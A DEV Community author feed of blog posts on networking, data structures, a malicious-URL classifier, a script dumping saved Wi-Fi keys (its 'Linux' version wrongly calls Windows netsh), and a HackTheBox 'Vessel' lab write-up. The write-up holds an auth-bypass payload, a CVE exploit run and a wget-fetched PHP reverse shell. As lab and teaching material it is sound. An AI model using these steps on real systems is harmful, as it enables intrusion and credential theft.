DEV Community: Muhammad Usman

TCP, UDP, and the Three-Way Handshake

Muhammad Usman — Fri, 14 Jul 2023 06:47:57 +0000

TCP (Transmission Control Protocol) and UDP (User Datagram Protocol) are both transport layer protocols used in computer networks to enable communication between devices. They have different characteristics and are suitable for different types of network applications.

TCP is a connection-oriented protocol that provides reliable and ordered delivery of data packets. It establishes a virtual circuit between the sender and receiver and ensures that data is received without errors and in the correct order. TCP achieves reliability through various mechanisms, such as acknowledgments, retransmissions, and flow control. It is commonly used for applications that require error-free and ordered delivery, such as web browsing, email, and file transfer.

On the other hand, UDP is a connectionless protocol that offers a lightweight and low-latency communication mechanism. Unlike TCP, UDP does not establish a dedicated connection before transmitting data. It simply encapsulates data into packets and sends them to the destination without any guarantee of delivery or order. UDP is useful for real-time applications where low latency is critical, such as streaming media, online gaming, and DNS (Domain Name System) lookups.

The Three-Way Handshake, also known as the TCP handshake, is a process that TCP uses to establish a connection between two devices. It is essential for initiating a reliable and ordered data transfer. The handshake involves three steps:

SYN (Synchronize): The client sends a TCP packet with the SYN flag set to the server. This packet contains a random sequence number and other TCP control information. The client enters the SYN_SENT state, waiting for a response.
SYN-ACK (Synchronize-Acknowledgment): If the server is willing to establish a connection, it responds with a TCP packet that has the SYN and ACK (acknowledgment) flags set. The packet includes its own random sequence number and an acknowledgment number that confirms the receipt of the client's SYN packet. The server enters the SYN-RECEIVED state.
ACK (Acknowledgment): Finally, the client acknowledges the server's response by sending a TCP packet with the ACK flag set. This packet contains the server's sequence number incremented by one and an acknowledgment number confirming the server's receipt. The client enters the ESTABLISHED state, and the server transitions to the ESTABLISHED state upon receiving this acknowledgment.

At this point, the TCP connection is established, and both the client and server can start exchanging data packets. If any of the steps fail or time out, the connection establishment fails, and the handshake is retried.

The Three-Way Handshake ensures that both devices agree on initial sequence numbers, confirms each other's readiness to establish a connection, and synchronizes the initial sequence number and acknowledgment number. This process provides a reliable foundation for the subsequent data transfer, error recovery, and flow control mechanisms employed by TCP.

In summary, TCP and UDP are transport layer protocols with different characteristics suited for different network applications. TCP offers reliable and ordered delivery, while UDP provides lightweight and low-latency communication. The Three-Way Handshake is a crucial process used by TCP to establish a connection between devices, ensuring synchronization and reliability in data transmission.

Markdown: A simple guide

Muhammad Usman — Tue, 18 Apr 2023 17:11:12 +0000

Markdown is a lightweight markup language that allows you to create formatted documents using a simple syntax. It was created by John Gruber in 2004, and has since become a popular choice for writing documentation, README files, and even blog posts. In this blog post, we'll explore the basics of Markdown and how you can use it to format your own documents.

Basic Syntax

The basic syntax of Markdown is designed to be as simple and intuitive as possible. Here are some of the most commonly used elements:

Headings

You can create headings by using one to six hash (#) symbols at the beginning of a line, followed by a space and the heading text. The number of hash symbols indicates the level of the heading, with one hash symbol indicating a top-level heading and six hash symbols indicating a subheading.

For example:

# This is a top-level heading
## This is a subheading
### This is a sub-subheading

Text Styling

You can style your text in various ways using Markdown:

Bold: To make text bold, surround it with two asterisks (*).
Italic: To make text italic, surround it with one asterisk ().
Strikethrough: To add a strikethrough to text, surround it with two tildes (~~).

For example:

This text is **bold**.
This text is *italic*.
This text is ~~strikethrough~~.

Lists

You can create both ordered and unordered lists using Markdown. To create an unordered list, simply start each item with a hyphen (-), plus sign (+), or asterisk (*). To create an ordered list, start each item with a number followed by a period (1., 2., 3., etc.).

For example:

- Item 1
- Item 2
- Item 3

1. First item
2. Second item
3. Third item

Links and Images

You can add links and images to your Markdown documents using the following syntax:

Links: To create a link, surround the link text with square brackets (
) and the URL with parentheses (
).
Images: To add an image, use the same syntax as links, but add an exclamation mark (!) before the square brackets.
For example:

[Click here to visit Google](https://www.google.com)

![Alt text](https://www.example.com/image.jpg)

Conclusion

Markdown is a simple yet powerful way to format text. It allows you to create documents quickly and easily, without having to worry about complicated formatting or styling. With just a few basic syntax elements, you can create professional-looking documents that are easy to read and understand. So the next time you need to create a document, give Markdown a try!

AVL Tree

Muhammad Usman — Fri, 24 Mar 2023 05:38:33 +0000

In this tutorial, you will learn what an avl tree is. Also, you will find working examples of various operations performed on an avl tree in C++ and Python.

AVL tree is a self-balancing binary search tree in which each node maintains extra information called a balance factor whose value is either -1, 0 or +1.

AVL tree got its name after its inventor Georgy Adelson-Velsky and Landis.

Balance Factor

Balance factor of a node in an AVL tree is the difference between the height of the left subtree and that of the right subtree of that node.

Balance Factor = (Height of Left Subtree - Height of Right Subtree) or (Height of Right Subtree - Height of Left Subtree)

The self balancing property of an avl tree is maintained by the balance factor. The value of balance factor should always be -1, 0 or +1.

Python:

C++:

Complexities of Different Operations on an AVL Tree

AVL Tree Applications

For indexing large records in databases
For searching in large databases

Hashmaps

Muhammad Usman — Wed, 22 Mar 2023 07:21:07 +0000

Definition

Hashmaps, also known as hash tables or dictionaries, are a fundamental data structure in computer science used to efficiently store and retrieve key-value pairs. In a hashmap, each key is mapped to a specific value through a hash function, which converts the key into a numeric index that is used to store and retrieve the associated value in an array-like data structure called a bucket.

The process of adding a key-value pair to a hashmap involves the following steps:

The hash function takes the key as input and produces a hash code, which is an integer value that represents the key in a more compact and standardized form.
The hash code is then used to compute an index into the array-like bucket structure, where the value associated with the key can be stored.
If there is already a value stored at the computed index, a collision has occurred, and a collision resolution strategy is used to handle the collision and store the new value in a different bucket.
If there is no value stored at the computed index, the new key-value pair is stored in the bucket at that index.
When retrieving a value from a hashmap, the process is similar:
The hash function is applied to the key to compute the hash code.
The hash code is used to compute the index into the bucket structure where the value should be stored.
The value at the computed index is returned, or if there is no value stored at that index, the key is not in the hashmap.
Hashmaps have several advantages over other data structures for storing key-value pairs. First, they offer fast average-case performance for accessing and retrieving values, with a time complexity of O(1) for both operations. Second, they can handle a large number of key-value pairs without requiring significant amounts of memory. Finally, hashmaps are dynamic data structures that can be resized and rehashed as needed to accommodate changes in the number of key-value pairs.

Implementation

class HashTable:
    def __init__(self, size):
        self.size = size
        self.hash_table = self.create_buckets()

    def create_buckets(self):
        return [[] for _ in range(self.size)]

    def set_val(self, key, val):
        hashed_key = hash(key) % self.size
        bucket = self.hash_table[hashed_key]
        found_key = False
        for index, record in enumerate(bucket):
            record_key, record_val = record
            if record_key == key:
                found_key = True
                break
        if found_key:
            bucket[index] = (key, val)
        else:
            bucket.append((key, val))

    def get_val(self, key):
        hashed_key = hash(key) % self.size
        bucket = self.hash_table[hashed_key]
        found_key = False
        for index, record in enumerate(bucket):
            record_key, record_val = record
            if record_key == key:
                found_key = True
                break
        if found_key:
            return record_val
        else:
            return "No record found"

    def delete_val(self, key):
        hashed_key = hash(key) % self.size
        bucket = self.hash_table[hashed_key]
        found_key = False
        for index, record in enumerate(bucket):
            record_key, record_val = record
            if record_key == key:
                found_key = True
                break
        if found_key:
            bucket.pop(index)
        return

    def __str__(self):
        return "".join(str(item) for item in self.hash_table)

Disadvantages:
However, hashmaps also have some disadvantages. The most significant issue is the possibility of collisions, which can degrade the performance of the data structure if not handled properly. Additionally, hashmaps can be vulnerable to certain types of attacks, such as hash collision attacks, which can be used to overwhelm the bucket structure with intentionally crafted keys.

To address these issues, hashmaps use various techniques for collision resolution, such as chaining (where multiple values are stored in the same bucket as a linked list) or open addressing (where additional buckets are probed until an empty bucket is found). Additionally, hash functions can be designed to minimize the likelihood of collisions or to be resistant to collision attacks.

Get Network Passwords

Muhammad Usman — Sun, 19 Mar 2023 17:52:02 +0000

Welcome to this blog post where I will walk you through the process of retrieving the Wi-Fi password saved on your PC. But before we proceed, we would like to issue a warning for educational purposes only. I do not condone or promote the unauthorized access of any Wi-Fi network without the owner's consent. The method we are going to discuss should only be used for educational purposes, to help you understand how Wi-Fi passwords are stored on your PC and to enable you to better protect your network from potential security breaches.

With that said, let's dive into the process of retrieving the Wi-Fi password saved on your PC. Many of us have experienced a situation where we want to connect a new device to our Wi-Fi network, but we can't remember the password. Fortunately, your PC stores the Wi-Fi password for each network that you have connected to in the past, and it's relatively easy to retrieve it.

Linux

#!/bin/bash

meta_data=$(netsh wlan show profiles)
data=$(echo "$meta_data" | iconv -f "windows-1251" -t "utf-8" | sed -n "s/    All User Profile     : //p")
profiles=($data)

printf "%-30s| %-s\n" "Wi-Fi Name" "Password"
printf "______________________________________________\n"

for i in "${profiles[@]}"
do
    results=$(netsh wlan show profile "$i" key=clear)
    password=$(echo "$results" | sed -n "s/    Key Content            : //p")

    if [ -z "$password" ]
    then
        password=""
    fi

    printf "%-30s| %-s\n" "$i" "$password"
done

Save this file with a suitable name, such as "wifi-passwords.sh". Make sure you set the executable bit for the file by running the following command:

chmod +x wifi-passwords.sh

You can then run the script using:

./wifi-passwords.sh

This will display a list of all saved Wi-Fi networks and their passwords. Note that this script may not work on all systems or may require modifications to work properly.

Windows

To convert the shell script to a batch file, you can create a new file with a .bat extension and add the following code:

@echo off
setlocal enabledelayedexpansion

for /f "tokens=2 delims=: " %%a in ('netsh wlan show profiles ^| findstr "All User Profile"') do (
    set "profile=%%a"
    set "profile=!profile:~1,-1!"
    set "password="
    for /f "tokens=2 delims=: " %%b in ('netsh wlan show profile "!profile!" key^=clear ^| findstr "Key Content"') do (
        set "password=%%b"
        set "password=!password:~1!"
        echo !profile! | powershell -Command "$input | Out-Host"
        echo !password! | powershell -Command "$input | Out-Host"
        echo "______________________________________________"
    )
)

Save this file with a suitable name, such as "wifi-passwords.bat". You can then run the batch file by double-clicking on it. This will display a list of all saved Wi-Fi networks and their passwords.

Note that the batch file may not work on all systems or may require modifications to work properly. Also, the batch file may display some non-ASCII characters incorrectly due to differences in character encoding between Bash and Windows Command Prompt

Train Url prediction

Muhammad Usman — Mon, 13 Mar 2023 06:50:15 +0000

As we navigate through an increasingly digitized world, the threat of cyber attacks looms large, making it crucial to have robust measures in place to protect ourselves. One such measure is the use of machine learning models to predict whether a URL is malicious or benign, and in this blog, we will explore just that.
The success of any machine learning model depends on the quality of the data it is trained on. In the case of building a model to predict whether a URL is malicious or benign, we need a dataset that contains examples of both types of URLs.
I found the perfect example of that Dataset

Processing

Preprocessing is a crucial step in machine learning that involves preparing the data for analysis by transforming it into a format that is suitable for the model. Preprocessing can involve a range of techniques, such as handling missing values, scaling the features, removing outliers, and encoding categorical variables. The importance of preprocessing lies in the fact that the quality of the data is directly proportional to the accuracy and effectiveness of the model. By preprocessing the data, we can remove noise and inconsistencies, standardize the features, and ensure that the data is in a format that is compatible with the machine learning algorithms. Preprocessing also helps to reduce the computational complexity of the model and can improve its performance by making it less sensitive to irrelevant or redundant features. Overall, preprocessing is an essential step in machine learning that can have a significant impact on the quality and efficacy of the model.
Imports

# Imports
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
import pickle

Reading the dataset

# Read the CSV file
df = pd.read_csv('data.csv',index_col=False)

# Print the first 5 rows of the data
df.head()

Columns

# Print the column labels of the data
df.columns

Unique labels

# Print all unique values in the 'label' column
print(df['label'].unique())

As we want the labels to be malicious or benign not good or bad we will map them

label_map = {'bad': "malicious", 'good': "benign"}

# use the map() method to replace the labels with numerical values
df['label'] = df['label'].map(label_map)
# Print all unique values in the 'label' column
print(df['label'].unique())

Getting percentage of malicious or benign urls

# calculate the percentage of 'benign' and 'malicious' labels
label_counts = df['label'].value_counts(normalize=True)
benign_percent = label_counts['benign'] * 100
malicious_percent = label_counts['malicious'] * 100

# create a pie chart
labels = ['Benign', 'Malicious']
sizes = [benign_percent, malicious_percent]
colors = ['green', 'red']
explode = (0, 0.1)

plt.pie(sizes, explode=explode, labels=labels, colors=colors,
        autopct='%1.1f%%', shadow=True, startangle=90)
plt.axis('equal')

plt.show()

Removing Duplicates:

# remove the duplicate rows based on all columns
df = df.drop_duplicates()
df.head()

Training

Training is the process of teaching a machine learning model to make accurate predictions by adjusting its internal parameters based on the input data. During training, the model is exposed to a set of labeled examples and iteratively updates its parameters to minimize the difference between the predicted output and the actual output. The objective of training is to create a model that can generalize well to new, unseen data by learning the underlying patterns and relationships in the training data. The quality of the training process depends on several factors, such as the size and diversity of the training data, the complexity of the model, and the choice of optimization algorithm. The goal of training is to achieve a balance between overfitting and underfitting, where the model is not too complex or too simple to make accurate predictions. Once the training process is complete, the model can be evaluated on a separate test dataset to assess its performance and generalization ability. Training is a critical step in the machine learning workflow that requires careful attention to ensure the model is both accurate and efficient.

Split Dataset

X = df['url']
y = df['label']
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)

Making a model

from sklearn.feature_extraction.text import TfidfVectorizer

vectorizer = TfidfVectorizer()
X_train = vectorizer.fit_transform(X_train)
X_test = vectorizer.transform(X_test)

Train the model

rf = RandomForestClassifier(n_estimators=100, random_state=42)
rf.fit(X_train, y_train)

Getting accuracy

from sklearn.metrics import accuracy_score, confusion_matrix

y_pred = rf.predict(X_test)
print("Accuracy:", accuracy_score(y_test, y_pred))
print("Confusion matrix:\n", confusion_matrix(y_test, y_pred))

Storing the model as pkl file:

with open('model.pkl', 'wb') as f:
    pickle.dump(rf, f)

How to use the model.pkl:

with open('model.pkl', 'rb') as f:
    model = pickle.load(f)

new_url = ['google.com/../../etc/pwd']
new_url_transformed = vectorizer.transform(new_url)
prediction = model.predict(new_url_transformed)
print(prediction)

This will output either 'malicious' or 'benign' depending on the prediction of the model.

Summary

In this conversation, we discussed several key aspects of machine learning, including finding datasets, preprocessing, and training. We highlighted the importance of finding quality datasets that are representative of the real-world scenarios the model is expected to encounter. Preprocessing was also discussed as a critical step to prepare the data for analysis by transforming it into a format that is suitable for the model. Lastly, we explored the training process, which involves teaching the model to make accurate predictions by adjusting its internal parameters based on the input data. Training is an iterative process that requires careful attention to ensure the model is both accurate and efficient. Overall, these are essential steps in the machine learning workflow that can significantly impact the performance and efficacy of the model.

The code can be found at Kaggle

Tree Structures

Muhammad Usman — Tue, 07 Mar 2023 05:22:57 +0000

Definition:

A tree structure, tree diagram, or tree model is a way of representing the hierarchical nature of a structure in a graphical form.

Practical Usage

Tree structures have a wide range of practical uses in computer science and programming. Here are some common examples:

File systems: File systems are often represented as tree structures, with directories as nodes and files as leaves. Each directory node can have one or more child nodes (sub-directories or files), forming a hierarchical structure that allows for efficient storage and retrieval of files.
Representing hierarchical data: Trees can be used to represent any kind of hierarchical data, such as organizational charts, family trees, and taxonomies. Each node in the tree represents a category or sub-category, and the edges between nodes represent the relationship between them.
Implementing search algorithms: Trees can be used to implement search algorithms such as binary search and breadth-first search. Binary search trees are particularly useful for searching for data in sorted lists, while breadth-first search trees can be used to search through large graphs or networks.
Decision trees: Decision trees are used in machine learning and data mining to model decisions and their possible consequences. Each node in the tree represents a decision point, and the edges represent the possible outcomes or consequences of that decision.
Syntax trees: Syntax trees are used in natural language processing to represent the structure of sentences in a language. Each node in the tree represents a part of speech or a phrase, and the edges represent the relationships between them. Overall, tree structures have a wide range of practical uses in computer science and programming, and their flexibility and efficiency make them a valuable tool for solving many different kinds of problems.

Example

In this example, we define a Node class that has a value attribute and a list of children nodes. We also define an add_child method to add child nodes to a parent node.

To create a tree, we first create a root node (in this case with a value of 1), and then add child nodes to it using the add_child method. In this example, we add two child nodes with values of 2 and 3 to the root node.

Conclusion

Tree structures are a fundamental data structure in computer science that are used to represent hierarchical relationships between elements. Trees consist of nodes connected by edges, with each node having zero or more child nodes.

Some common use cases for trees include representing file systems, representing the structure of a website or an organization, and implementing search algorithms such as binary search.

There are many types of trees, including binary trees, n-ary trees, and balanced trees such as AVL trees and red-black trees. Each type of tree has its own advantages and disadvantages, and the choice of which type of tree to use depends on the specific requirements of the problem being solved.
Overall, trees are a powerful and flexible data structure that can be used in a wide range of applications. Understanding the basics of trees and how to implement them can be a valuable skill for any computer scientist or programmer.

Thank you....

HACKTHEBOX (HTB) WRITEUP: VESSEL [HARD]

Muhammad Usman — Sun, 05 Mar 2023 15:31:35 +0000

Objectives

User flag
Root flag

SCANNING

> TARGET=10.129.112.189 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-title: Vessel
|_http-favicon: Unknown favicon MD5: 9A251AF46E55C650807793D0DB9C38B8
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

WEB ENUM

Inspecting the web page found a domain name: vessel.htb, add this to /etc/hosts
Registering an account at http://vessel.htb/register shows currently not available
Inspecting the traffic found a connect.sid, this indicates the use of nodejs express

POST /api/register HTTP/1.1
Host: vessel.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Origin: http://vessel.htb
Connection: close
Referer: http://vessel.htb/register
Cookie: connect.sid=s%3ARkA_yhB0F8t4odxYkuBR7mSZW-eC_dHI.%2BQIqgvsy53mYn4YE12ma%2BtBKcRNpCaLdzcM4d5Gd81U
Upgrade-Insecure-Requests: 1

Running path scan found a path called /dev

> dirsearch -u http://vessel.htb/

Continue dirsearch under /dev found this is a git repository.

> dirsearch -u http://vessel.htb/dev

Use git-dumper to dump the git repo

> python3 ~/tools/git-dumper/git_dumper.py http://vessel.htb/dev repo

Note that there might be an error saying 'Index' object has no attribute 'iterblobs', to fix, pin your dulwich version to 0.20.20

> python3 -m pip install dulwich==0.20.20

Subdomain enum didn’t find anything

> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://vessel.htb/" -H "Host: FUZZ.vessel.htb"

SOURCE CODE INSPECTION

Inspect git log of the leaked repo

> git log
commit 208167e785aae5b052a4a2f9843d74e733fbd917 (HEAD -> master)
Author: Ethan <ethan@vessel.htb>
Date:   Mon Aug 22 10:11:34 2022 -0400
    Potential security fixes
commit edb18f3e0cd9ee39769ff3951eeb799dd1d8517e
Author: Ethan <ethan@vessel.htb>
Date:   Fri Aug 12 14:19:19 2022 -0400
    Security Fixes
commit f1369cfecb4a3125ec4060f1a725ce4aa6cbecd3
Author: Ethan <ethan@vessel.htb>
Date:   Wed Aug 10 15:16:56 2022 -0400
    Initial commit

From git log, found developer name is Ethan

Author: Ethan <ethan@vessel.htb>

Found db credential in config/db.js

var connection = {
        db: {
        host     : 'localhost',
        user     : 'default',
        password : 'daqvACHKvRn84VdVp',
        database : 'vessel'
}};

BYPASS WEB LOGIN

By inspecting the code, it seems that the sqli issue had been fixed in /routes/inject.js

router.post('/api/login', function(req, res) {
    let username = req.body.username;
    let password = req.body.password;
    if (username && password) {
        connection.query('SELECT * FROM accounts WHERE username = ? AND password = ?', [username, password], function(error, results, fields) {
            if (error) throw error;
            if (results.length > 0) {
                req.session.loggedin = true;
                req.session.username = username;
                req.flash('success', 'Succesfully logged in!');
                res.redirect('/admin');
            } else {
                req.flash('error', 'Wrong credentials! Try Again!');
                res.redirect('/login');
            }           
            res.end();
        });
    } else {
        res.redirect('/login');
    }
});

However, note that the username and password fields can be evaluated as objects, instead of strings. For more detail see this post: https://www.stackhawk.com/blog/node-js-sql-injection-guide-examples-and-prevention/
So, to bypass the auth check, run burp to intercept the traffic and send a login request, then in burp, change the request to the following

username=admin&password[password]=1

Bypass the login to get to the admin dashboard and under user icon found a button to Analytics, where a new subdomain is found: openwebanalytics.vessel.htb, add this to /etc/hosts

OPENWEBANALYTICS
With some searches online, it is found that openwebanalytics (owa) is vulnerable to a recently discovered vulnerability: https://www.cvedetails.com/cve/CVE-2022-24637/, more detail can be found here: https://devel0pment.de/?p=2494
The vulnerable source code can be found here: https://github.com/Open-Web-Analytics/Open-Web-Analytics/tree/1.7.3
Inspecting the code in modules/base/classes/fileCache.php, basically, a cache file is generated with its corresponding action, the cache file is stored at

$cache_file = $this->makeCollectionDirPath($collection).$id.'.php';
# this corresponds to http://openwebanalytics.vessel.htb/owa-data/caches/1/
# cache_id is 1 by default

The cache file is generated using the id of the user in the format: md5(id1)
So, for the user with an id of 1, the cache name would be: fafe1b60c24107ccd8f4562213e44849
Using http://openwebanalytics.vessel.htb/index.php?owa_do=base.passwordResetForm, we can figure out a valid email, admin@vessel.htb
i assume this user has an id of 1, and in the end it turns out to be true.
We can attempt to login using this account, even a failed login will generate the cache file under: http://openwebanalytics.vessel.htb/owa-data/caches/1/owa_configuration/, yet this cache doesn’t contain any user sensitive info. So we need to find other corresponding actions to generate another caches.
With some Google search, i found someone else’s website running owa and revealed how the cache files are named. Then way i searched is using google search operators:

inurl: "owa-data/caches"

Later, i found that by requesting to reset password for the user admin@vessel.htb, a cache will be generated at http://openwebanalytics.vessel.htb/owa-data/caches/1/owa_user/fafe1b60c24107ccd8f4562213e44849.php, this can be observed because when a cache file is there, the path http://openwebanalytics.vessel.htb/owa-data/caches/1/owa_user/ will display a blank page instead of the directory listing view.
Check the content of the file:

# get the base64 encoded content and then decode it
> curl http://openwebanalytics.vessel.htb/owa-data/caches/1/owa_user/fafe1b60c24107ccd8f4562213e44849.php
O:8:"owa_user":5:{s:4:"name";s:9:"base.user";s:10:"properties";a:10:{s:2:"id";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:1:"1";s:9:"data_type";s:6:"SERIAL";s:11:"foreign_key";N;s:14:"is_primary_key";b:0;s:14:"auto_increment";b:0;s:9:"is_unique";b:0;s:11:"is_not_null";b:0;s:5:"label";N;s:5:"index";N;s:13:"default_value";N;}s:7:"user_id";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:5:"admin";s:9:"data_type";s:12:"VARCHAR(255)";s:11:"foreign_key";N;s:14:"is_primary_key";b:1;s:14:"auto_increment";b:0;s:9:"is_unique";b:0;s:11:"is_not_null";b:0;s:5:"label";N;s:5:"index";N;s:13:"default_value";N;}s:8:"password";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:60:"$2y$10$seT74YJuo1hsZgXS4UCYFOMogk95iQzGkCR9YjXoUAOg7w.dwumzO";s:9:"data_type";s:12:"VARCHAR(255)";s:11:"foreign_key";N;s:14:"is_primary_key";b:0;s:14:"auto_increment";b:0;s:9:"is_unique";b:0;s:11:"is_not_null";b:0;s:5:"label";N;s:5:"index";N;s:13:"default_value";N;}s:4:"role";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:5:"admin";s:9:"data_type";s:12:"VARCHAR(255)";s:11:"foreign_key";N;s:14:"is_primary_key";b:0;s:14:"auto_increment";b:0;s:9:"is_unique";b:0;s:11:"is_not_null";b:0;s:5:"label";N;s:5:"index";N;s:13:"default_value";N;}s:9:"real_name";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:13:"default admin";s:9:"data_type";s:12:"VARCHAR(255)";s:11:"foreign_key";N;s:14:"is_primary_key";b:0;s:14:"auto_increment";b:0;s:9:"is_unique";b:0;s:11:"is_not_null";b:0;s:5:"label";N;s:5:"index";N;s:13:"default_value";N;}s:13:"email_address";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:16:"admin@vessel.htb";s:9:"data_type";s:12:"VARCHAR(255)";s:11:"foreign_key";N;s:14:"is_primary_key";b:0;s:14:"auto_increment";b:0;s:9:"is_unique";b:0;s:11:"is_not_null";b:0;s:5:"label";N;s:5:"index";N;s:13:"default_value";N;}s:12:"temp_passkey";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:32:"56801c66e2a182724800625776088f0e";s:9:"data_type";s:12:"VARCHAR(255)";s:11:"foreign_key";N;s:14:"is_primary_key";b:0;s:14:"auto_increment";b:0;s:9:"is_unique";b:0;s:11:"is_not_null";b:0;s:5:"label";N;s:5:"index";N;s:13:"default_value";N;}s:13:"creation_date";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:10:"1650211659";s:9:"data_type";s:6:"BIGINT";s:11:"foreign_key";N;s:14:"is_primary_key";b:0;s:14:"auto_increment";b:0;s:9:"is_unique";b:0;s:11:"is_not_null";b:0;s:5:"label";N;s:5:"index";N;s:13:"default_value";N;}s:16:"last_update_date";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:10:"1650211659";s:9:"data_type";s:6:"BIGINT";s:11:"foreign_key";N;s:14:"is_primary_key";b:0;s:14:"auto_increment";b:0;s:9:"is_unique";b:0;s:11:"is_not_null";b:0;s:5:"label";N;s:5:"index";N;s:13:"default_value";N;}s:7:"api_key";O:12:"owa_dbColumn":11:{s:4:"name";s:7:"api_key";s:5:"value";s:32:"a390cc0247ecada9a2b8d2338b9ca6d2";s:9:"data_type";s:12:"VARCHAR(255)";s:11:"foreign_key";N;s:14:"is_primary_key";b:0;s:14:"auto_increment";b:0;s:9:"is_unique";b:0;s:11:"is_not_null";b:0;s:5:"label";N;s:5:"index";N;s:13:"default_value";N;}}s:16:"_tableProperties";a:4:{s:5:"alias";s:4:"user";s:4:"name";s:8:"owa_user";s:9:"cacheable";b:1;s:23:"cache_expiration_period";i:604800;}s:12:"wasPersisted";b:1;s:5:"cache";N;}

The password hash can be found from the cache, but it cannot be cracked. However, we can see there is a temp_passkey, which can be used with the base.usersChangePassword action to change the account’s password

http://openwebanalytics.vessel.htb/index.php?owa_do=base.usersChangePassword

Inspect the form to check the key name (hidden in the form) used for this request owa_k
Remove the hidden property, and paste the temp_passkey into the field, then change the password
Now, you should be able to login the account admin using the newly set password

FOOTHOLD
Once logged in as admin, there is a poc that exploits the settings page: https://github.com/watchdog2000/cve-2022-24637_open-web-analytics-info-disclosure-to-rce
For details about how this exploit works, read the second vulnerability on https://devel0pment.de/?p=2494#vuln2. Basically, there is lacking restriction on the config checking, so this can be exploited to set a different base.error_log_file (can be a php file) and a different logging level base.error_log_level.

> python3 cve-2022-24637.py -u http://openwebanalytics.vessel.htb/ -U admin -P test123
[+] - Found cache url: http://openwebanalytics.vessel.htb//owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php
[+] - Downloaded cache
[+] - Found passkey: c849df0b12c44d26568c2be0e99e4862
[+] - Changed password of user admin to 'test123'
[+] - Submitted update for log file, ready for RCE...
SHELL> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Note that this shell is very unstable, you’d better upgrade to a better shell

> cp /usr/share/webshells/php/php-reverse-shell.php w.php
# change the IP and port
# in the owa rce shell
SHELL> wget http://10.10.16.59/w.php
# run a nc listener and browse to http://openwebanalytics.vessel.htb/owa-data/logs/w.php in the browser

Once receiving a better shell

REVERSE ENG

There is a passwordGenerator under /home/steven, this appears to be a windows executable
There is also a png and a pdf file under /home/steven/.notes/

/home/steven/.notes/screenshot.png
/home/steven/.notes/notes.pdf

The notes.pdf file is password protected, and the screenshot.png shows you what possible password complexity is used to generate the password.
Coming back to passwordGenerator. This is a windows 32 PE file, which is compiled using pyinstaller, to decompile it, use

https://github.com/extremecoders-re/pyinstxtractor

Note that this tool is made for 3.7, so, to ensure things can be extracted correctly, you need to install python3.7
Then, install uncompyle6 to decompile the passwordGenerator.pyc file, it is suggested to create a virtualenv for python3.7 so that you can always revert when things didn’t work out

# install virtualenv and activate
python.exe -m pip install virtualenv
python.exe -m virtualenv env37
env37\Scripts\activate
# extract content
python pyinstxtractor.py passwordGenerator
# decompile
pip install uncompyle6
uncompyle6 passwordGenerator.pyc

Reading the code, it would seem that there is a 32¹²⁸ combinations of passwords, however, running the code on these lines shows that the idx will only be a limited number of values due to how QT implements the random number generator.

qsrand(QTime.currentTime().msec())
password = ''
for i in range(length):
    idx = qrand() % len(charset)

Copying the genPassword code and modify it to make it work.
Then create a while loop to genreate passwords, the process will become extremely slow at around 1000 passwords.

from PySide2.QtCore import *
def genPassword():
    length = 32
    char = 0
    if char == 0:
        charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890~!@#$%^&*()_-+={}[]|:;<>,.?'
    else:
        if char == 1:
            charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
        else:
            if char == 2:
                charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890'
            else:
                pass
    try:
        qsrand(QTime.currentTime().msec())
        password = ''
        for i in range(length):
            idx = qrand() % len(charset)
            nchar = charset[idx]
            password += str(nchar)
    except:
        print('error')
    return password
def gen_possible_passes():
    passes = []
    try:
        while True:
            ps = genPassword()
            if ps not in passes:
                passes.append(ps)
                # print(ps)
                print(len(passes))
    except KeyboardInterrupt:
        with open('pass.txt', 'w') as ofile:
            for p in passes:
                ofile.write(p + '\n')
gen_possible_passes()

Then use it with pdfcrack, you should have your password.

> pdfcrack -f notes.pdf -w ~/share/passwordGenerator_extracted/pass.txt
PDF version 1.6
Security Handler: Standard
V: 2
R: 3
P: -1028
Length: 128
Encrypted Metadata: True
FileID: c19b3bb1183870f00d63a766a1f80e68
U: 4d57d29e7e0c562c9c6fa56491c4131900000000000000000000000000000000
O: cf30caf66ccc3eabfaf371623215bb8f004d7b8581d68691ca7b800345bc9a86
found user-password: 'YG7Q7RDzA+q&ke~MJ8!yRzoI^VQxSqSS'

Open up the pdf file, you should have ethan’s password

Dear Steven,
As we discussed since I'm going on vacation you will be in charge of system maintenance. Please
ensure that the system is fully patched and up to date.
